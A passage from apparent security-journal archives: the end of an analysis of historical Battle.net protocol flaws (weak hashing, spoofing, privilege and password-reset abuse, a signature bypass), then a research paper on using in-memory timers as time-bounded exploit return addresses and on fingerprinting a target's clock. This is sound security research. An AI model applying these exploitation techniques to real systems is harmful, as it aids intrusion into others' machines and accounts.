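                              # by (word mod 32) bits instead

print(hex(correct))  # 0xd5b7ddfb
print(hex(swapped))  # 0x28000 - only two bits set; the data fed into the
                     # rest of the hash is now dominated by zero bits
```

Every round of the broken hash therefore mixes in a small rotated constant
rather than the message data, which is why the resulting password hashes are
so much weaker than real SHA-1 digests.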
The second system Blizzard utilizes is one based off of SRP (Secure Remote
Password, see http://srp.stanford.edu). Only Warcraft III and its expansion
use this system for password authentication. This product has its own
account namespace on Battle.net, so that there are no backwards compatibility
issues with the older ``broken SHA-1'' method. It is worth noting that
Warcraft III clients and older clients can still communicate via chat, however
- the server imposes a namespace decoration to client account names for
communication between namespaces, such that a client logged on as Warcraft III
would see a user ``User'' logged on as Starcraft on the USEast Battle.net
network as ``User@USEast''. However, this system is also flawed, albeit less
severely. In particular, the endian-ness of calculations is reversed, but
this is not properly accounted for in some parts of the implementation, such
that some operations expecting to remove trailing zero bits instead remove
leading zero bits after converting a large integer to a flat binary buffer.
There is a second flaw, as well, although it does not negatively impact the
security of the client: In some of the conversions from big numbers to flat
buffers, the server does not properly zero out bytes if the big number does
not occupy 32 non-zero bytes, and instead leaves uninitialized data in them.
The result is that some authentication attempts will randomly fail. As far as
the author knows, this bug is still present in Battle.net.
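The leading-versus-trailing mix-up can be sketched in a few lines of Python.
The 32-byte buffer size matches the description above, but the example value
and the stripping code are illustrative assumptions, not Blizzard's actual
implementation:

```python
n = 0x123400  # hypothetical big number whose low-order byte happens to be 0

# Flat 32-byte little-endian buffer, as an SRP implementation might produce.
buf = n.to_bytes(32, "little")

# Intended: strip the *trailing* zero bytes, which in little-endian order
# are the number's unused high-order bytes - this round-trips losslessly.
ok = buf.rstrip(b"\x00")
assert int.from_bytes(ok, "little") == n

# Flawed: strip the *leading* zero bytes instead. In little-endian order
# these are significant low-order bytes, so the value is silently corrupted
# whenever it ends in zero bytes - and the authentication math then fails.
bad = buf.lstrip(b"\x00")
assert int.from_bytes(bad, "little") != n
```

Because only values with zero bytes at the affected end are corrupted, the
failure appears random from the user's perspective, matching the symptom of
occasional spurious logon failures described above.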
3.2.4) Client namespace spoofing
With the release of Warcraft III, a separate account namespace was provided
for users of that product, as mentioned above. The server internally keeps
track of a user's account name as ``x#username'', where x is a character
specifying an alternate namespace (the only currently known namespace
designation is 'w', for Warcraft III). This is known due to a message that
exposes the internal unique name for a user to protocol clients. While the
character '#' has never been permitted in account names, if a user logs on to
the same account more than once, they are assigned a unique name of the format
'accountname#serial', where 'serial' is a number that is incremented according
to how many duplicate logons of the same account there are. Due to a lack of
parameter checking in the account creation process, it was at one time
possible to create accounts, via a third party client, that were one character
long (all of the
official game clients do not allow the user to do this). For some time, such
accounts confused the server into thinking that a user was actually on a
different (non-existent) namespace, and thus allowed a user who logged on to a
single character account more than once to become impossible to 'target' via
any of the user management functions. For example, such a user could not be
sent a private message, ignored, banned or kicked from a channel, or otherwise
affected by any other commands that operate on a specific user. This was, of
course, frequently abused to spam individuals with the victims being unable to
stop the spammer (or even ignore them!). This problem has been fixed in the
current server version.
3.2.5) Username collisions
As referred to in the previous sub-section, for some time the server allowed
Diablo Shareware clients. These clients did not log on to accounts, and
instead simply assigned themselves a username. Normal procedures were
followed if the username was already in use, which involved appending a serial
number to the end to make a unique name. Besides the obvious problem of being
able to impersonate someone to a user who was not clever enough to check what
game type one was logged on as, this creates an additional vulnerability that
was heavily exploited in ``channel wars''. If a server became split from the
rest of the network due to load, one could log on to that server using Diablo
Shareware, and pick the same name as someone logged on to the rest of the
network using a different game type. When the server split was resolved, the
server would notice that there were now two users with the same unique name,
and disconnect both of them with the ``Duplicate username detected.'' message
(this is synonymous with the ``colliding'' exploits of old that used to plague
IRC). This could be used to force users offline any time a server split
occurred. Being able to do so was desirable in the sense that there could
normally only be one channel operator in a channel at a time (barring server
splits, which could be used to create a second operator if the channel was
entirely emptied and then recreated on the split server). When that operator
left, the next person in line would be gifted with operator permissions
(unless the operator had explicitly 'designated' a new heir for operator
permissions). So, one could ``take over'' a channel by systematically
disconnecting those ``ahead of'' one's client in a channel. A channel is
ordered by a user's age in the channel.
3.2.6) Server de-synchronization
At one time, a race condition existed such that if a malicious user were to
log on to two connected (i.e. not-split) servers at the same time, the two
servers would cease to communicate with one another, causing a server split to
occur. It is
difficult to provide an exact explanation for why this would occur given the
collision elimination mechanism described above for users that are logged on
with the same unique name, but it is assumed that in the process of
synchronizing a new user between servers, there is a period of time during
which a second server can also attempt to synchronize the same user and cause
one of the servers to get into an invalid state. According to observations,
this
invalid state would eventually be resolved automatically, usually after 10-15
minutes.
3.2.7) Seeing invisible users
Battle.net administrators have the ability to become invisible to normal
users. However, until recently, this was flawed in that the server would
expose the existence of an invisible user to regular users during certain
operations. In particular, if one ignores or unignores a user, the server
will re-send the state of all users that are ignored or unignored in the
current channel. Before this bug was fixed, this list included any invisible
users. It is worth noting that the official game clients will ignore any
unknown users returned in the state update message, so this vulnerability
could only be utilized by a third party client.
3.2.8) Administrative command discovery
Originally, Battle.net would provide no acknowledgement if one issued an
unrecognized chat command ("slash-command"). Blizzard later changed the
server software to respond with an error message if a user sent an unknown
command, but the server originally silently ignored the command if the user
issued a privileged (administrator-only) command. This allowed end users to
discover the names of various commands accessible to system administrators.
3.2.9) Gaining administrative privileges
Due to an oversight in the way administrator permissions are assigned to
Battle.net accounts, it was at one time possible to overwrite the account of
an administrator with a new account and keep the special permissions otherwise
associated with the account. (An account can be overwritten like so if it has
not been accessed in 90 days). This could have very nearly resulted in a
disaster for Blizzard, had a more malicious user discovered this vulnerability
and abused such privileges.
3.2.10) Obtaining passwords
Eventually, Blizzard implemented a password recovery mechanism whereby one
could associate an e-mail address with an account, and request a password
change through the Battle.net protocol for an account at logon time. This
would result in an e-mail being dispatched to the registered address. If the
user then replied to the mail as instructed, they would be automatically
mailed back with a new account password. Unfortunately, as originally
implemented, this system did not properly perform validation on the
confirmation mail that the user was required to send. In particular, if a
malicious user created an account ``victim'' on one Battle.net network, such
as the Asian network, and then requested a password reset for that account,
they could alter the return email slightly and actually reset the password for
the account ``victim'' on a different Battle.net network, such as the USEast
network. This exploit was actually publicly disclosed and saw over a day of
heavy abuse before Blizzard managed to patch it.
4) Battle.net server emulation
Blizzard 'declared war' on the programmers of servers that implement the
Battle.net protocol some time ago when they took the developers of ``bnetd''
to court. As of Warcraft III, they have taken active measures to make life
difficult for developers programming third party Battle.net-compatible
servers. In particular, two actions are of note:
During the Warcraft III Expansion beta test, Blizzard implemented an
encryption scheme for the Battle.net protocol (this was only used during the
beta test and not on production Battle.net). This consisted of using the RC4
cipher to encrypt messages sent and received from the server. The tricky part
was that Blizzard had hardcoded constants that were encrypted using the cipher
state, but never actually sent on the wire (these constants were different for
each message). This made implementing a server difficult, as one had to find
each magic constant. Unfortunately, Blizzard neglected to consider the
possibility of someone releasing a hacked version of the client that zeroed
the RC4
initialization parameters, such that the entire encrypted stream became
plaintext.
After several patches, Blizzard implemented a scheme by which a Warcraft III
client could verify that it was indeed connecting to a genuine Blizzard
Battle.net server. This scheme worked by having the Battle.net server sign
its IP address and send the resulting signature to the client, which would
refuse to log on if the server's IP address did not match the signature.
However, in the original implementation, the game client only checked the
first four bytes of the signed data, and did not validate the remaining
(normally zero) 124 bytes. This allows one to easily brute-force a signature
that encodes a desired IP address, as one only has to search at most 2^32
candidate signatures to find it.
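The flaw can be modeled with a toy verifier in Python. The 4-byte comparison
and the 128-byte signature size are taken from the description above; the
check itself is a simplified stand-in, not Blizzard's actual routine, and the
IP address is a documentation-range placeholder:

```python
import socket

SIG_LEN = 128

def flawed_client_check(decrypted_sig: bytes, server_ip: str) -> bool:
    """Models the buggy client: only the first 4 bytes of the decrypted
    signature are compared against the server's packed IPv4 address; the
    remaining 124 (normally zero) bytes are never validated."""
    return decrypted_sig[:4] == socket.inet_aton(server_ip)

# An attacker only needs some signature whose public-key operation yields the
# right leading 4 bytes - a search over at most 2**32 candidates - rather
# than a forgery of all 128 bytes. Against this toy check, any blob with the
# right prefix passes:
forged = socket.inet_aton("203.0.113.7") + b"\x00" * (SIG_LEN - 4)
print(flawed_client_check(forged, "203.0.113.7"))  # True
```

In the real scheme the attacker cannot choose the decrypted bytes directly,
which is why a brute-force search over candidate signatures is needed; the
point is that the work factor collapses from the full signature length to 32
bits.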
5) Conclusion
Developing a platform to support a diverse set of requirements such as
Battle.net is certainly no easy task. Though the original design could have
perhaps been improved upon, it is the author's opinion that given what they
had to work with, Blizzard did a reasonable job of ensuring that the service
they set out to create stood the test of time, especially considering that
support for all the future features of their later game clients could not have
been predicted at the time the system was originally created. Nevertheless, it
is the author's opinion that a system designed where clients are untrusted and
all actions performed by them are subject to full validation would have been
far more secure from the start, without any of the various problems Blizzard
has encountered over the years.
uninformed/2.2.txt
Temporal Return Addresses: Exploitation Chronomancy
skape
mmiller@hick.org
Last modified: 8/6/2005
1) Foreword
Abstract: Nearly all existing exploitation vectors depend on some knowledge of
a process' address space prior to an attack in order to gain meaningful
control of execution flow. In cases where this is necessary, exploit authors
generally make use of static addresses that may or may not be portable between
various operating system and application revisions. This fact can make
exploits unreliable depending on how well researched the static addresses were
at the time that the exploit was implemented. In some cases, though, it may
be possible to predict and make use of certain addresses in memory that do not
have static contents. This document introduces the concept of temporal
addresses and describes how they can be used, under certain circumstances, to
make exploitation more reliable.
Disclaimer: This document was written in the interest of education. The
author cannot be held responsible for how the topics discussed in this
document are applied.
Thanks: The author would like to thank H D Moore, spoonm, thief, jhind,
johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of
nologin!
With that, on with the show...
2) Introduction
A common impediment to the implementation of portable and reliable exploits is
the location of a return address. It is often required that a specific
instruction, such as a jmp esp, be located at a predictable location in memory
so that control flow can be redirected into an attacker controlled buffer.
This scenario is more common on Windows, but applicable scenarios exist on
UNIX derivatives as well. Many times, though, the locations of the
instructions will vary between individual versions of an operating system,
thus limiting an exploit to a set of version-specific targets that may or may
not be directly determinable at attack time. In order to make an exploit
independent of, or at least less dependent on, a target's operating system
version, a shift in focus becomes necessary.
Through the blur of rhyme and reason an attacker might focus and realize that
not all viable return addresses will exist indeterminably in a target process'
address space. In fact, viable return addresses can be found in a transient
state throughout the course of a program's execution. For instance, a pointer
might be stored at a location in memory that happens to contain a viable two
byte instruction somewhere within the bytes that compose the pointer's
address. Alternatively, an integer value somewhere in memory could be
initialized to a value that is equivalent to a viable instruction. In both
cases, though, the contents and locations of the values will almost certainly
be volatile and unpredictable, thus making them unsuitable for use as return
addresses.
Fortunately, however, there does exist at least one condition that can lend
itself well to portable exploitation that is bounded not by the operating
system version the target is running on, but instead by a defined window of
time. In a condition such as this, a timer of some sort must exist at a
predictable location in memory that is known to be updated at a constant time
interval, such as every second. The location in memory that the timer resides
at is known as a temporal address. On top of this, it is also important for
the attacker to determine the scale of measurement the timer is operating on,
such as whether or not it's measured in epoch time (from 1970 or 1601) or if
it's simply acting as a counter. With these three elements identified, an
attacker can attempt to predict the periods of time where a useful instruction
can be found in the bytes that compose the future state of any timer in
memory.
To help illustrate this, suppose an attacker is attempting to find a reliable
location of a jmp edi instruction. The attacker knows that the program being
exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a
predictable location in memory. By doing some analysis, the attacker could
determine that on Wednesday July 27th, 2005 at 3:39:12PM CDT, a jmp edi could
be found within any four byte timer that stores the number of seconds since
1970. The window of opportunity, however, would only last for 4 minutes and 16
seconds assuming the timer is updated every second.
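The windowing arithmetic above can be checked directly. Assuming a 4-byte
little-endian counter of seconds since 1970, the two-byte encoding of jmp edi
(FF E7) must land in the counter's middle two bytes, which leaves the low byte
free to run for a 256-second window; this sketch finds the next such window
after an arbitrary starting time:

```python
import struct
from datetime import datetime, timezone

JMP_EDI = b"\xff\xe7"  # x86 encoding of "jmp edi"

def next_jmp_edi_window(start: int):
    """Return (first, last) epoch seconds of the next window in which
    bytes 1-2 of the little-endian 32-bit timer encode jmp edi."""
    base = (start & 0xFF000000) | 0x00E7FF00
    if base + 0xFF < start:
        base += 0x01000000  # window already passed; wait for the next cycle
    return base, base + 0xFF

first, last = next_jmp_edi_window(1122000000)  # some time in July 2005
assert struct.pack("<I", first)[1:3] == JMP_EDI
assert last - first + 1 == 256  # low byte free-runs over 0x00..0xFF
print(datetime.fromtimestamp(first, timezone.utc))  # 2005-07-27 21:39:12+00:00
```

The computed window opens on July 27th, 2005 and lasts 4 minutes and 16
seconds, in line with the figures given above (modulo timezone bookkeeping).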
By accounting for timing as a factor in the selection of return addresses, an
attacker can be afforded options beyond those normally seen when the address
space of a process is viewed as unchanging over time. In that light, this
document is broken into three portions. First, the steps needed to find,
analyze, and make use of temporal addresses will be explained. Second,
upcoming viable opcode windows will be shown and explained along with methods
that can be used to determine target time information prior to exploitation.
Finally, examples of commonly occurring temporal addresses on Windows NT+ will
be described and analyzed to provide real world examples of the subject of
this document.
Before starting, though, it is important to understand some of the terminology
that will be used, or perhaps abused, in the interest of conveying the
concepts. The term temporal address is used to describe a location in memory
that contains a timer of some sort. The term opcode is used interchangeably
with the term instruction to convey the set of viable bytes that could
partially compose a given temporal state. The term update period is used to
describe the amount of time that it takes for the contents of a temporal
address to change. Finally, the term scale is used to describe the unit of
measure for a given temporal address.
3) Locating Temporal Addresses
In order to make use of temporal addresses it is first necessary to devise a
method of locating them. To begin this search it is necessary that one
understand the attributes of a temporal address. All temporal addresses are
defined as storing a time-associated counter that increments at a constant
interval. For instance, an example would be a location in memory that stores
the number of seconds since Jan. 1, 1970 that is incremented every second. As
a more concrete definition, all time-associated counters found in memory are
represented in terms of a scale (the unit of measure), an interval or period
(how often they are updated), and have a maximum storage capacity (variable
size). If any of these parts are unknown or variant for a given memory
location, it is impossible for an attacker to consistently leverage it as a
time-bounded return address because of the inability to predict the byte
values at the location for a given period of time.
With the three major components of a temporal address identified (scale,
period, and capacity), a program can be written to search through a process'
address space with the goal of identifying regions of memory that are updated
at a constant period. From there, a scale and capacity can be inferred based
on an arbitrarily complex set of heuristics, the simplest of which can
identify regions that are storing epoch time. It's important to note, though,
that not all temporal addresses will have a scale that is measured as an
absolute time period. Instead, a temporal address may simply store the number
of seconds that have passed since the start of execution, among other
scenarios. These temporal addresses are described as having a scale that is
simply equivalent to their period and are for that reason referred to as
counters.
To illustrate the feasibility of such a program, the author has implemented an
algorithm that should be conceptually portable to all platforms, though the
implementation itself is limited to Windows NT+. The approach taken by the
author, at a high level, is to poll a process' address space multiple times
with the intention of analyzing changes to the address space over time. In
order to reduce the amount of memory that must be polled, the program is also
designed to skip over regions that are backed against an image file or are
otherwise inaccessible.
To accomplish this task, each polling cycle is designed to be separated by a
constant (or nearly constant) time interval, such as 5 seconds. By increasing
the interval between polling cycles the program can detect temporal addresses
that have a larger update period. The granularity of this period of time is
measured in nanoseconds in order to support high resolution timers that may
exist within the target process' address space. This allows the program to
detect timers measured in nanoseconds, microseconds, milliseconds, and
seconds. The purpose of the delay between polling cycles is to give temporal
address candidates the ability to complete one or more update periods. As
each polling cycle occurs, the program reads the contents of the target
process' address space for a given region and caches it locally within the
scanning process. This is necessary for the next phase.
After at least two polling cycles have completed, the program can compare the
cached memory region differences between the most recent view of the target
process' address space and the previous view. This is accomplished by walking
through the contents of each cached memory region in four byte increments to
see if there is any difference between the two views. If a temporal address
exists, the contents of the two views should have a difference that is no
larger than the maximum period of time that occurred between the two polling
cycles. It's important to remember that the maximum period can be conveyed
down to nanosecond granularity. For instance, if the polling cycle period was
5 seconds, any portion of memory that changed by more than 5 seconds, 5000
milliseconds, or 5000000 microseconds is obviously not a temporal address
candidate. To that point, any region of memory that didn't change at all is
also most likely not a temporal address candidate, though it is possible that
the region of memory simply has an update period that is longer than the
polling cycle.
Once a memory location is identified that has a difference between the two
views that is within or equal to the polling cycle period, the next step of
analysis can begin. It's perfectly possible for memory locations that meet
this requirement to not actually be timers, so further analysis is necessary
to weed them out. At this point, though, memory locations such as these can
be referred to as temporal address candidates. The next step is to attempt to
determine the period of the temporal address candidate. This is accomplished
by some rather silly, but functional, logic.
First, the delta between the polling cycles is calculated down to nanosecond
granularity. In a best case scenario, the granularity of a polling cycle that
is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to
assume this constant though, as thread scheduling and other non-constant
parameters can affect the delta between polling cycles for a given memory
region. The next step is to iteratively compare the difference between the
two views to the current delta to see if the difference is greater than or
equal to the current delta. If it is, it can be assumed that the difference
is within the current unit of measure. If it's not, the current delta should
be divided by 10 to progress to the next unit of measure. When broken down,
the progressive transition in units of measurement is described in figure 3.1.
Delta Measurement
---------------------------
1000000000 Nanoseconds
100000000 10 Nanoseconds
10000000 100 Nanoseconds
1000000 Microseconds
100000 10 Microseconds
10000 100 Microseconds
1000 Milliseconds
100 10 Milliseconds
10 100 Milliseconds
1 Seconds
Figure 3.1: Delta measurement reductions
Once a unit of measure for the update period is identified, the difference is
divided by the current delta to produce the update period for a given temporal
address candidate. For example, if the difference was 5 and the current delta
was 5, the update period for the temporal address candidate would be 1 second
(5 updates over the course of 5 seconds). With the update period identified,
the next step is to attempt to determine the storage capacity of the temporal
address candidate.
In this case, the author chose to take a shortcut, though there are most
certainly better approaches that could be taken given sufficient interest.
The author chose to assume that if the update period for a temporal address
candidate was measured in nanoseconds, then it was almost certainly at least
the size of a 64-bit integer (8 bytes on x86). On the other hand, all other
update periods were assumed to imply a 32-bit integer (4 bytes on x86).
With the temporal address candidate's storage capacity identified in terms of
bytes, the next step is to identify the scale that the temporal address may be
conveying (the timer's unit of measure). To accomplish this, the program
calculates two epoch time ranges, in seconds since 1970 and since 1601,
spanning from the current time minus at least the polling cycle period up to
the current time itself.
The temporal address candidate's current value (as stored in memory) is then
converted to seconds using the determined update period and then compared
against the two epoch time ranges. If the candidate's converted current value
is within either epoch time range then it can most likely be assumed that the
temporal address candidate's scale is measured from epoch time, either from
1970 or 1601 depending on the range it was within. While this sort of
comparison is rather simple, any other arbitrarily complex set of logic could
be put into place to detect other types of time scales. In the event that
none of the logic matches, the temporal address candidate is deemed to simply
have a scale of a counter (as defined previously in this chapter).
Finally, with the period, scale, and capacity for the temporal address
candidate identified, the only thing left is to check to see if the three
components are equivalent to previously collected components for the given
temporal address candidate. If they differ in orders of magnitude then it is
probably safe to assume that the candidate is not actually a temporal address.
On the other hand, consistent components between polling cycles for a temporal
address candidate are almost a sure sign that it is indeed a temporal address.
When everything is said and done, the program should collect every temporal
address in the target process that has an update period less than or equal to
the polling cycle period. It should also have determined the scale and size
of the temporal address. When run on Windows against a program that is
storing the current epoch time since 1970 in seconds in a variable every
second, the following output is displayed:
C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
This output tells us that the address of the variable that is storing the
epoch time since 1970 can be found at 0x0012FF7C and has an update period of
one second. The other things that were found will be discussed later in this
document.
3.1) Determining Per-byte Durations
Once the update period and size of a temporal address have been determined, it
is possible to calculate the amount of time it takes to change each byte
position in the temporal address. For instance, if a four byte temporal
address with an update period of 1 second were found in memory, the first byte
(or LSB) would change once every second, the second byte would change once
every 256 seconds, the third byte would change once every 65536 seconds, and
the fourth byte would change once every 16777216 seconds. The reason these
properties are exhibited is because each byte position has 256 possibilities
(0x00 to 0xff inclusive). This means that each byte position increases in
duration by 256 to a given power. This can be described as shown in figure
3.2. Let x equal the byte index starting at zero for the LSB.
duration(x) = 256 ^ x
Figure 3.2: Period independent byte durations
The next step to take after determining period-independent byte durations is
to convert the durations into seconds when the update period is more granular
than a second. For instance, figure 3.3 shows that if each byte duration is
measured in 100 nanosecond intervals for an 8 byte temporal address, a
conversion can be applied to turn a byte duration expressed in 100 nanosecond
intervals into seconds.
tosec(x) = duration(x) / 10^7
Figure 3.3: 100 nanosecond byte durations to seconds
This phase is especially important when it comes to calculating viable opcode
windows because it is necessary to know for how long a viable opcode will
exist, which is directly dependent on the duration of the opcode byte closest
to the LSB. This will be discussed in more detail in chapter 4.
4) Calculating Viable Opcode Windows
Once a set of temporal addresses has been located, the next logical step is to
attempt to calculate the windows of time that one or more viable opcodes can
be found within the bytes of the temporal address. It is also just as
important to calculate the duration of each byte within the temporal address.
This is the type of information that is required in order to determine when a
portion of a temporal address can be used as a return address for an exploit.
The approach taken to accomplish this is to make use of the equations provided
in the previous chapter for calculating the number of seconds it takes for
each byte to change based on the update period for a given temporal address.
By using the tosec function for each byte index, a table can be created as
illustrated in figure 4.1 for a 100 nanosecond 8 byte timer.
Byte Index Seconds (ext)
------------------------
0 0 (zero)
1 0 (zero)
2 0 (zero)
3 1 (1 sec)
4 429 (7 mins 9 secs)
5 109951 (1 day 6 hours 32 mins 31 secs)
6 28147497 (325 days 18 hours 44 mins 57 secs)
7 7205759403 (228 years 179 days 23 hours 50 mins 3 secs)
Figure 4.1: 8 byte 100ns per-byte durations in seconds
This shows that any opcodes starting at byte index 4 will have a 7 minute and
9 second window of time. The only thing left to do is figure out when to
strike.
5) Picking the Time to Strike
The time to attack is entirely dependent on both the update period of the
temporal address and its scale. In most cases, temporal addresses that have a
scale that is relative to an arbitrary date (such as 1970 or 1601) are the
most useful because they can be predicted or determined with some degree of
certainty. Regardless, a generalized approach can be used to determine
projected time intervals where useful opcodes will occur.
To do this, it is first necessary to identify the set of instructions that
could be useful for a given exploit, such as a jmp esp. Once identified, the
next step is to break the instructions down into their raw opcodes, such as
0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is
then necessary to begin calculating the projected time intervals that the
bytes will occur at. The method used to accomplish this is rather simple.
First, a starting byte index must be determined in terms of the lowest
acceptable window of time that an exploit can use. In the case of a 100
nanosecond timer, the best byte index to start at would be byte index 4
considering all previous indexes have a duration of less than or equal to one
second. The bytes that occur at index 4 have a 7 minute and 9 second
duration, thus making them feasible for use. With the starting byte index
determined, the next step is to create permutations of all subsequent opcode
byte combinations. In simpler terms, this would mean producing all of the
possible byte value combinations that contain the raw opcodes of a given
instruction at a byte index equal to or greater than the starting byte index.
To help visualize this, figure 5.1 provides a small sample of jmp esp byte
combinations in relation to a 100 nanosecond timer.
Byte combinations
-----------------------
00 00 00 00 ff e4 00 00
00 00 00 00 ff e4 01 00
00 00 00 00 ff e4 02 00
...
00 00 00 00 ff e4 47 04
00 00 00 00 ff e4 47 05
00 00 00 00 ff e4 47 06
...
00 00 00 00 00 ff e4 00
00 00 00 00 00 ff e4 01
00 00 00 00 00 ff e4 02
Figure 5.1: 8 byte 100ns jmp esp byte combinations
Once all of the permutations have been generated, the next step is to convert
them to meaningful absolute time representations. This is accomplished by
converting all of the permutations, which represent past, future, or present
states of the temporal address, to seconds. For instance, one of the
permutations for a jmp esp instruction found within the 64-bit 100 nanosecond
timer is 0x019de4ff00000000 (116500949249294336). Converting this to seconds
is accomplished by doing:
11650094924 = trunc(116500949249294336 / 10^7)
This tells us the number of seconds that will have passed when the stars align
to form this byte combination, but it does not convey the scale in which the
seconds are measured, such as whether they are based from an absolute date
(such as 1970 or 1601) or are simply acting as a timer. In this case, if the
scale were defined as being the number of seconds since 1601, the total number
of seconds could be adjusted to indicate the number of seconds that have
occurred since 1970 by subtracting the constant number of seconds between 1970
and 1601:
5621324 = 11650094924 - 11644473600
This indicates that a total of 5621324 seconds will have passed since 1970
when 0xff will be found at byte index 4 and 0xe4 will be found at byte index
5. The window of opportunity will be 7 minutes and 9 seconds after which
point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the
instruction will no longer be usable. If 5621324 is converted to a printable
date format based on the number of seconds since 1970, one can find that the
date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST
1970.
While it has now been shown that it is perfectly possible to predict specific
times
in the past, present, and future that a given instruction or instructions can
be found within a temporal address, such an ability is not useful without
being able to predict or determine the state of the temporal address on a
target computer at a specific moment in time. For instance, while an
exploitation chronomancer knows that a jmp esp can be found on March 6th, 1970
at about 7:30 PM, it must also be known what the target machine's system time
is set to, down to a granularity of mere seconds, or at least minutes.
While guessing is always an option, it is almost certainly going to be less
fruitful than making use of existing tools and services that are more than
willing to provide a would-be attacker with information about the current
system time on a target machine. Some of the approaches that can be taken to
gather this information will be discussed in the next section.
5.1) Determining System Time
There are a variety of techniques that can potentially be used to determine
the system time of a target machine with varying degrees of accuracy. The
techniques listed in this section are by no means all-encompassing but do
serve as a good base. Each technique will be elaborated on in the following
sub-sections.
5.1.1) DCERPC SrvSvc NetrRemoteTOD
One approach that can be taken to obtain very granular information about the
current system time of a target machine is to use the SrvSvc's NetrRemoteTOD
request. To transmit this request to a target machine a NULL session (or
authenticated session) must be established using the standard Session Setup
AndX SMB request. After that, a Tree Connect AndX to the IPC share should be
issued. From there, an NT Create AndX request can be issued on the named
pipe. Once the request is handled successfully the file descriptor returned
can be used for the DCERPC bind request to the SrvSvc's UUID. Finally, once
the bind request has completed successfully, a NetrRemoteTOD request can be
transacted over the named pipe using a TransactNmPipe request. The response
to this request should contain very granular information, such as day, hour,
minute, second, timezone, as well as other fields that are needed to determine
the target machine's system time. Figure shows a sample response.
This vector is very useful because it provides easy access to the complete
state of a target machine's system time which in turn can be used to calculate
the windows of time that a temporal address can be used during exploitation.
The downside to this approach is that it requires access to the SMB ports
(either 139 or 445) which will most likely be inaccessible to an attacker.
5.1.2) ICMP Timestamps
The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement
of the number of milliseconds that have occurred since midnight UT. If an
attacker can infer or assume that a target machine's system time is set to a
specific date and timezone, it may be possible to calculate the absolute
system time down to a millisecond resolution. This would satisfy the timing
requirements and make it possible to make use of temporal addresses that have
a scale that is measured from an absolute time. According to the RFC, though,
if a system is unable to determine the number of milliseconds since UT then it
can use another value capable of representing time (though it must set a
high-order bit to indicate the non-standard value).
5.1.3) IP Timestamp Option
Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that
measures the number of milliseconds since midnight UT. This could also be used
to determine down to a millisecond resolution what the remote system's clock
is set to. Since the measurement is the same, the limitations are the same as
ICMP's TIMESTAMP request.
5.1.4) HTTP Server Date Header
In scenarios where a target machine is running an HTTP server, it may be
possible to extract the system time by simply sending an HTTP request and
checking to see if the response contains a date header or not. Figure shows
an example HTTP response that contains a date header.
5.1.5) IRC CTCP TIME
Perhaps one of the more lame approaches to obtaining a target machine's time
is by issuing a CTCP TIME request over IRC. This request is designed to
instruct the responder to reply with a readable date string that is relative
to the responder's system time. Unless spoofed, the response should be
equivalent to the system time on the remote machine.
6) Determining the Return Address
Once all the preliminary work of calculating all of the viable opcode windows
has been completed and a target machine's system time has been determined, the
final step is to select the next available window for a compatible opcode
group. For instance, if the next window for a jmp esp equivalent instruction
is Sun Sep 25 22:37:28 CDT 2005, then the byte index to the start of the jmp
esp equivalent must be determined based on the permutation that was generated.
In this case, the permutation that would have been generated (assuming a
100 nanosecond period since 1601) is 0x01c5c25400000000. This means that the
jmp esp equivalent is actually a push esp, ret which starts at byte index four.
If the start of the temporal address was at 0x7ffe0014, then the return
address that should be used in order to get the push esp, ret to execute would
be 0x7ffe0018. This basic approach is common to all temporal addresses of
varying capacity, period, and scale.
7) Case Study: Windows NT SharedUserData
With all the generic background information out of the way, a real world
practical use of this technique can be illustrated through an analysis of a
region of memory that happens to be found in every process on Windows NT+.
This region of memory is referred to as SharedUserData and has a backward
compatible format for all versions of NT, though new fields have been appended
over time. At present, the data structure that represents SharedUserData is
KUSER_SHARED_DATA, which is defined as follows on Windows XP SP2:
0:000> dt _KUSER_SHARED_DATA
+0x000 TickCountLow : Uint4B
+0x004 TickCountMultiplier : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
+0x020 TimeZoneBias : _KSYSTEM_TIME
+0x02c ImageNumberLow : Uint2B
+0x02e ImageNumberHigh : Uint2B
+0x030 NtSystemRoot : [260] Uint2B
+0x238 MaxStackTraceDepth : Uint4B
+0x23c CryptoExponent : Uint4B
+0x240 TimeZoneId : Uint4B
+0x244 Reserved2 : [8] Uint4B
+0x264 NtProductType : _NT_PRODUCT_TYPE
+0x268 ProductTypeIsValid : UChar
+0x26c NtMajorVersion : Uint4B
+0x270 NtMinorVersion : Uint4B
+0x274 ProcessorFeatures : [64] UChar
+0x2b4 Reserved1 : Uint4B
+0x2b8 Reserved3 : Uint4B
+0x2bc TimeSlip : Uint4B
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
+0x2d0 SuiteMask : Uint4B
+0x2d4 KdDebuggerEnabled : UChar
+0x2d5 NXSupportPolicy : UChar
+0x2d8 ActiveConsoleId : Uint4B
+0x2dc DismountCount : Uint4B
+0x2e0 ComPlusPackage : Uint4B
+0x2e4 LastSystemRITEventTickCount : Uint4B
+0x2e8 NumberOfPhysicalPages : Uint4B
+0x2ec SafeBootMode : UChar
+0x2f0 TraceLogging : Uint4B
+0x2f8 TestRetInstruction : Uint8B
+0x300 SystemCall : Uint4B
+0x304 SystemCallReturn : Uint4B
+0x308 SystemCallPad : [3] Uint8B
+0x320 TickCount : _KSYSTEM_TIME
+0x320 TickCountQuad : Uint8B
+0x330 Cookie : Uint4B
One of the purposes of SharedUserData is to provide processes with a global
and consistent method of obtaining certain information that may be requested
frequently, thus making it more efficient than having to incur the performance
hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as
an indirect system call re-director such that the most optimized system call
instructions can be used based on the current hardware's support, such as by
using sysenter over the standard int 0x2e.
As can be seen right off the bat, SharedUserData contains a few fields that
pertain to the timing of the current system. Furthermore, if one looks
